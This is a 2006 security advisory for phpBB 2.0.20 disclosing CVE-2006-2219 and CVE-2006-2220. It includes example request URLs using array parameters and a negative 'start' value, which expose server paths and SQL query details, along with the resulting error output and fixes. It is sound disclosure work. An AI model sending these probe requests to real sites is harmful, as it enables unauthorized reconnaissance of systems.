phpBB 2.0.20 Full Path Disclosure and SQL Errors

Sat, 06 May 2006 16:01:01 -0700 

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1


[phpBB 2.0.20 Full Path Disclosure and SQL Errors]


Author: Maksymilian Arciemowicz (cXIb8O3)

Date:

- -Written: 1.5.2006

- -Public: 5.5.2006


from SecurityReason.Com

CVE:

- - CVE-2006-2219 Full Path Disclosure

- - CVE-2006-2220 Sql Errors


- --- 0.Description ---

phpBB is a high powered, fully scalable, and highly customizable Open Source 
bulletin board package. phpBB has a


user-friendly interface, simple and straightforward administration panel, and 
helpful FAQ. Based on the powerful PHP


server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC 
database servers, phpBB is the ideal


free community solution for all web sites.

Contact with author http://www.phpbb.com/about.php.


- --- 1. Full Path Disclosure ---

Many scripts, for example phpBB, have a basic bug. It exists in variables, 
which are being inserted into script, into specific functions. For example 
function htmlspecialchars()


...

        if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, 
&str_len, &quote_style, &hint_charset, &hint_charset_len) == FAILURE) {

                return;

        }

...


As you can see there is a protection from formatting input variable. If the 
variable is other than string, we have error with Full Path Disclosure.


Example:


http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx


- ---Code ---

if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )

{

        $mode = ( isset($HTTP_POST_VARS['mode']) ) ? 
htmlspecialchars($HTTP_POST_VARS['mode']) : 
htmlspecialchars($HTTP_GET_VARS['mode']);

}

else

{

        $mode = 'joined';

}

- ---Code ---


- ---Result ---

Warning: htmlspecialchars() expects parameter 1 to be string, array given in 
/www/2020/phpBB2/memberlist.php on line 40


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/memberlist.php:40) in 
/www/2020/phpBB2/includes/page_header.php on line 483


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/memberlist.php:40) in 
/www/2020/phpBB2/includes/page_header.php on line 485


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/memberlist.php:40) in 
/www/2020/phpBB2/includes/page_header.php on line 486

- ---Result ---


http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx


- ---Result ---

Warning: htmlspecialchars() expects parameter 1 to be string, array given in 
/www/2020/phpBB2/viewtopic.php on line 487


Warning: urlencode() expects parameter 1 to be string, array given in 
/www/2020/phpBB2/viewtopic.php on line 498


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/viewtopic.php:487) in 
/www/2020/phpBB2/includes/page_header.php on line 483


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/viewtopic.php:487) in 
/www/2020/phpBB2/includes/page_header.php on line 485


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/viewtopic.php:487) in 
/www/2020/phpBB2/includes/page_header.php on line 486

- ---Result ---


Problem appears if display_errors==1, but it exists on many websites. (even at 
php.net).


- --- 2. Sql Errors ---


Problem appears because we can add everything (INT) to the end of SQL query 
(LIMIT). The query will fail if the value is below 0 or above -2^32.


Example:


http://[HOST]/2020/phpBB2/memberlist.php?start=-1


- ---Code ---

$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 
0;

- ---Code ---


- ---Result ---

Could not query users


DEBUG MODE


SQL Error : 1064 You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near '-1, 
50' at line 4


SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, 
user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, 
user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER 
BY user_regdate ASC LIMIT -1, 50


Line : 151

File : memberlist.php

- ---Result ---


- --- 3. How to fix ---

Turn off display_errors or use function like is_string().


- --- 4. Greets ---

sp3x


Infospec, p_e_a, krasza, revival, l5x


- --- 5. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]

Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com

GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

SecurityReason.Com

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.2.2 (FreeBSD)


iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5

7DlqP3M3vq1frb7Zc3y+KrU=

=4U6Y

-----END PGP SIGNATURE-----

Reply via email to